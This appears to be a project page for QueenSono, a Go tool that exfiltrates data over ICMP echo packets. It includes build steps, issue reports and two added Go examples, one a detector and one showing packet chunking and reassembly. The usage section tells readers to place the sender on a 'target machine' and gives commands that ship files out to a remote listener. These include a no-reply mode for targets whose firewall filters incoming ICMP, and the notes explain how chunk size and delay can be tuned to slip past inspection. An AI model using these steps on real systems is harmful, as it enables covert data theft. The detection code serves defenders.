Golang binary for data exfiltration with ICMP protocol

Overview

QueenSono ICMP Data Exfiltration

A Golang package for data exfiltration with the ICMP protocol.

QueenSono relies only on ICMP not being monitored, which is quite common. It can also be used against a system with basic ICMP inspection (i.e. a frequency and content-length watcher). It tries to imitate PyExfil (and others), with the idea that the target machine does not necessarily have Python installed, so providing a single binary can be useful.
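The "basic ICMP inspection" mentioned above, a frequency and content-length watcher, is exactly what a defender would put in front of a tool like this. The following is an added example written for this page, not QueenSono's own code, in Go: it runs such a watcher over constructed echo-request records (the thresholds, hosts and timestamps are assumptions) and flags a source sending oversized payloads and a source beaconing at a high rate, while an ordinary ping passes.

```go
package main

import (
	"fmt"
	"sort"
	"time"
)

// EchoRecord is one observed ICMP echo request, as a sensor (a pcap parser, Zeek's
// conn.log, or flow records with ICMP fields) would hand it to the watcher.
type EchoRecord struct {
	Src  string
	Dst  string
	Len  int // ICMP data length in bytes, after the 8-byte ICMP header
	Seen time.Time
}

// Alert is one finding about a source host.
type Alert struct {
	Src    string
	Reason string
}

// Thresholds are assumptions for this example; tune them per environment.
const (
	maxNormalLen = 64 // Linux ping sends 56 data bytes by default, Windows 32
	maxPerWindow = 30 // more echo requests than this in one window is suspicious
	window       = time.Minute
)

// Inspect is the "basic ICMP inspection" watcher: it flags sources that send
// oversized echo payloads (content length) or too many requests within any
// one-minute window (frequency). One alert per (source, reason), sorted.
func Inspect(recs []EchoRecord) []Alert {
	bySrc := map[string][]EchoRecord{}
	for _, r := range recs {
		bySrc[r.Src] = append(bySrc[r.Src], r)
	}
	var alerts []Alert
	for src, rs := range bySrc {
		sort.Slice(rs, func(i, j int) bool { return rs[i].Seen.Before(rs[j].Seen) })
		maxLen := 0
		for _, r := range rs {
			if r.Len > maxLen {
				maxLen = r.Len
			}
		}
		if maxLen > maxNormalLen {
			alerts = append(alerts, Alert{src, fmt.Sprintf("echo request with %d-byte payload (normal <= %d)", maxLen, maxNormalLen)})
		}
		// Sliding window over the time-sorted requests from this source.
		start, peak := 0, 0
		for end := range rs {
			for rs[end].Seen.Sub(rs[start].Seen) > window {
				start++
			}
			if n := end - start + 1; n > peak {
				peak = n
			}
		}
		if peak > maxPerWindow {
			alerts = append(alerts, Alert{src, fmt.Sprintf("%d echo requests within %s (limit %d)", peak, window, maxPerWindow)})
		}
	}
	sort.Slice(alerts, func(i, j int) bool {
		if alerts[i].Src != alerts[j].Src {
			return alerts[i].Src < alerts[j].Src
		}
		return alerts[i].Reason < alerts[j].Reason
	})
	return alerts
}

// SampleRecords is constructed traffic: an ordinary ping, a QueenSono-style
// sender (50000-byte payloads every 2 s) and a beacon with normal-sized
// payloads but a high request rate.
func SampleRecords() []EchoRecord {
	t0 := time.Date(2022, 8, 1, 12, 0, 0, 0, time.UTC)
	var recs []EchoRecord
	for i := 0; i < 5; i++ { // ping 10.0.0.2 -> 10.0.0.1, one per second
		recs = append(recs, EchoRecord{"10.0.0.2", "10.0.0.1", 56, t0.Add(time.Duration(i) * time.Second)})
	}
	for i := 0; i < 10; i++ { // exfil: big payloads, one every 2 s
		recs = append(recs, EchoRecord{"10.0.0.7", "10.0.0.92", 50000, t0.Add(time.Duration(2*i) * time.Second)})
	}
	for i := 0; i < 40; i++ { // beacon: normal size, one per second for 40 s
		recs = append(recs, EchoRecord{"10.0.0.9", "203.0.113.5", 56, t0.Add(time.Duration(i) * time.Second)})
	}
	return recs
}

func main() {
	for _, a := range Inspect(SampleRecords()) {
		fmt.Printf("%s: %s\n", a.Src, a.Reason)
	}
}
```

The length check alone catches a 50000-byte echo request whatever its timing, which is why a sender that wants to survive this kind of inspection has to keep its chunk size near that of a normal ping and its delay long, at the cost of throughput; the rate check then becomes the one that matters.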


Install

> Install the binary from source

Clone the repo and download the dependencies locally:

git clone https://github.com/ariary/QueenSono.git
make before.build

To build the ICMP packet sender qssender:

make build.queensono-sender

To build the ICMP packet receiver qsreceiver:

make build.queensono-receiver

Usage

qssender is the binary that sends the ICMP packets to the listener, so it is the binary you have to transfer to your target machine.

qsreceiver is the listener on your local machine (or wherever you can receive ICMP packets).

All commands and flags of the binaries can be listed with --help.

Example 1: Send with "ACK"

> In this example we want to send a big file and watch for the echo replies to acknowledge the reception of the packets (ACK).


On local machine:

$ qsreceiver receive -l 0.0.0.0 -p -f received_bible.txt

Explanation
  • -l 0.0.0.0 listen on all interfaces for ICMP packets
  • -f received_bible.txt save the received data in a file
  • -p show a progress bar of received data

On target machine:

$ wget https://raw.githubusercontent.com/mxw/grmr/master/src/finaltests/bible.txt #download a huge file (for the example)
$ qssender send file -d 2 -l 127.0.0.1 -r 10.0.0.92 -s 50000 bible.txt

Explanation
  • send file for sending a file (bible.txt is the file in question)
  • -d 2 send a packet every 2 seconds
  • -l 127.0.0.1 the local address on which qssender listens for the echo replies
  • -r 10.0.0.92 the address of my remote machine with qsreceiver listening
  • -s 50000 the data size I want to send in each packet

Example 2: Send without "ACK"

> In this example we want to send a message without waiting for the echo reply (it can be useful in case the target firewall filters incoming ICMP packets)

On local machine:

$ qsreceiver receive truncated 1 -l 0.0.0.0

Explanation
  • receive truncated 1 does not wait indefinitely if we don't receive all the packets (1 is the delay used with qssender)

On target machine:

$ qssender send "thisisatest i want to send a string w/o waiting for the echo reply" -d 1 -l 127.0.0.1 -r 10.0.0.190 go.mod -s 1 -N

Explanation
  • -N noreply option (don't wait for the echo reply)
Notes

  • only works on Linux (due to the use of the Go net ICMP package)
  • needs the cap_net_raw capability (raw ICMP sockets are used on both sides)
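To make the send/receive exchange of the two examples concrete, here is an added example in Go, written for this page and not taken from QueenSono (whose wire framing may differ): it builds ICMP echo requests with the RFC 792 header and RFC 1071 checksum using only the standard library, chunks a message into them (capped at 65507 bytes, the IPv4 maximum of 65535 minus the 20-byte IPv4 and 8-byte ICMP headers), validates packets on the receiver side as every receiver or sensor must, and reassembles out-of-order, duplicated and dropped chunks, reporting the holes. The transfer id 0x5150, the seq-from-0 framing and the sample message are assumptions; nothing here opens a raw socket, so it runs without cap_net_raw.

```go
package main

import (
	"encoding/binary"
	"errors"
	"fmt"
)

const (
	echoRequest    = 8
	echoReply      = 0
	icmpHeaderLen  = 8
	MaxEchoPayload = 65535 - 20 - icmpHeaderLen // IPv4 max minus IPv4 and ICMP headers: 65507
)

// Checksum is the RFC 1071 one's-complement sum; it is 0 over a packet whose checksum field is filled in.
func Checksum(b []byte) uint16 {
	var sum uint32
	for i := 0; i+1 < len(b); i += 2 {
		sum += uint32(b[i])<<8 | uint32(b[i+1])
	}
	if len(b)%2 == 1 {
		sum += uint32(b[len(b)-1]) << 8
	}
	for sum>>16 != 0 {
		sum = sum&0xffff + sum>>16
	}
	return ^uint16(sum)
}

// BuildEcho serialises an echo message: type, code 0, checksum, id, seq, data.
func BuildEcho(typ byte, id, seq uint16, data []byte) []byte {
	pkt := make([]byte, icmpHeaderLen+len(data))
	pkt[0] = typ
	binary.BigEndian.PutUint16(pkt[4:], id)
	binary.BigEndian.PutUint16(pkt[6:], seq)
	copy(pkt[icmpHeaderLen:], data)
	binary.BigEndian.PutUint16(pkt[2:], Checksum(pkt))
	return pkt
}

// Echo is a parsed echo request or reply.
type Echo struct {
	Type    byte
	ID, Seq uint16
	Data    []byte
}

// ParseEcho rejects short, non-echo or corrupt packets before any field is trusted.
func ParseEcho(pkt []byte) (Echo, error) {
	if len(pkt) < icmpHeaderLen || (pkt[0] != echoRequest && pkt[0] != echoReply) || Checksum(pkt) != 0 {
		return Echo{}, errors.New("not a well-formed ICMP echo message")
	}
	return Echo{pkt[0], binary.BigEndian.Uint16(pkt[4:]), binary.BigEndian.Uint16(pkt[6:]), pkt[icmpHeaderLen:]}, nil
}

// Chunk splits data into echo requests of at most size data bytes, one transfer id, seq from 0 (the example's own framing).
func Chunk(id uint16, data []byte, size int) [][]byte {
	if size <= 0 || size > MaxEchoPayload {
		size = MaxEchoPayload
	}
	var pkts [][]byte
	for seq := 0; len(data) > 0; seq++ {
		n := size
		if n > len(data) {
			n = len(data)
		}
		pkts = append(pkts, BuildEcho(echoRequest, id, uint16(seq), data[:n]))
		data = data[n:]
	}
	return pkts
}

// Reassemble restores one transfer in seq order, skipping corrupt packets, replies, foreign pings and
// duplicates, and lists the seqs that never arrived (ICMP has no retransmission; a lost tail is invisible).
func Reassemble(id uint16, pkts [][]byte) (data []byte, missing []uint16) {
	chunks, last := map[uint16][]byte{}, -1
	for _, p := range pkts {
		if e, err := ParseEcho(p); err == nil && e.Type == echoRequest && e.ID == id {
			chunks[e.Seq] = e.Data // a duplicate just rewrites the same bytes
			if int(e.Seq) > last {
				last = int(e.Seq)
			}
		}
	}
	for s := 0; s <= last; s++ {
		if c, ok := chunks[uint16(s)]; ok {
			data = append(data, c...)
		} else {
			missing = append(missing, uint16(s))
		}
	}
	return data, missing
}

func main() {
	pkts := Chunk(0x5150, []byte("constructed sample: this would be bible.txt on the target"), 16) // id is an assumption
	wire := [][]byte{pkts[3], pkts[1], pkts[0], pkts[0], BuildEcho(echoReply, 0x5150, 0, nil)} // reversed, seq 2 lost, a duplicate, a reply
	got, missing := Reassemble(0x5150, wire)
	fmt.Printf("%d bytes recovered, missing seq %v\n", len(got), missing)
}
```

On the wire, a sender would write each packet from Chunk to a raw ip4:icmp socket and, in ACK mode, wait for an echo reply carrying the same id and seq before moving on; the target's kernel answers echo requests by itself, which is also why the -N mode still delivers data when the target's firewall drops incoming ICMP, it just loses the ability to notice the holes that Reassemble reports here.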
Issues

  • Write ip4 127.0.0.1 -> x.x.x.x (Ip Receiver) sendto: invalid argument

    I'm trying this Go in my test environment and this problem occurs. Maybe I need to test some other OS.

    I tried with CentOS 8 and CentOS 7 and have the same issue/problem: Write ip4 127.0.0.1 -> x.x.x.x (Ip Receiver) sendto: invalid argument

    This problem happens on the "sender" machine. It occurs after running the command qssender send file -d 2 -l 127.0.0.1 -r 10.0.0.92 -s 50000 bible.txt

    KR Jose

    bug
    opened by zamzibar-bofh 6
  • Cannot execute qssender on Mac

    I have started the listening host on my Kali (VM with bridged connection; can ping). I am trying to send a doc of small size from my Mac to my Kali using qssender but can't. Required permissions are given. How should I execute this qssender file? I am using the qssender file that I created in my Kali along with qsreceiver.

    opened by KRiteshchowdary 2
  • Manipulate echo reply

    For now, using the net package does not allow modifying the echo reply (echo reply msg = original msg).

    If we were able to do so, we could change the exchange direction (first the client sends a request to the server, and the content is added in the echo reply msg).

    enhancement
    opened by ariary 0
  • Optimize packet size

    It seems that getPacket does not take into account the ICMP packet header: cf. https://github.com/ariary/QueenSono/blob/59dd5da577325ac5f45f0012112886b893c4d88c/pkg/icmp/receive.go#L138

    Try replacing it with 65535, to get the whole size of the IP packet.

    (https://stackoverflow.com/questions/9449837/maximum-legal-size-of-icmp-echo-packet)

    bug enhancement
    opened by ariary 2
Releases

v1.1.2

Owner

Ariary
Security Engineer naively hoping that his technical background will one day be more effective than social engineering